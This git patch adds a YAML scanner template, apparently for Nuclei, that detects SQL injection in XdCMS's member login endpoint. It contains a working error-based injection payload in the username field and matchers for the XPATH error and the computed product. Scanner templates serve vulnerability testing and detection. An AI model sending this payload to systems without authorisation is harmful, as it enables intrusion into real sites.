From 7674824c98dff93d21f33717e36ce5d4dab753b5 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sun, 21 Mar 2021 10:15:44 +0000
Subject: [PATCH] Create xdcms-sqli.yaml

---
 vulnerabilities/other/xdcms-sqli.yaml | 36 +++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 vulnerabilities/other/xdcms-sqli.yaml

diff --git a/vulnerabilities/other/xdcms-sqli.yaml b/vulnerabilities/other/xdcms-sqli.yaml
new file mode 100644
index 0000000000..c0204fd48c
--- /dev/null
+++ b/vulnerabilities/other/xdcms-sqli.yaml
@@ -0,0 +1,36 @@
+id: xdcms-sqli
+
+info:
+  name: XdCMS SQL Injection
+  author: pikpikcu
+  severity: high
+  reference: https://www.uedbox.com/post/35188/
+  tags: sqli,xdcms
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/index.php?m=member&f=login_save"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Content-Type: text/html"
+        part: header
+
+      - type: word
+        words:
+          - "707564257851522176"
+          - "XPATH syntax error:"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200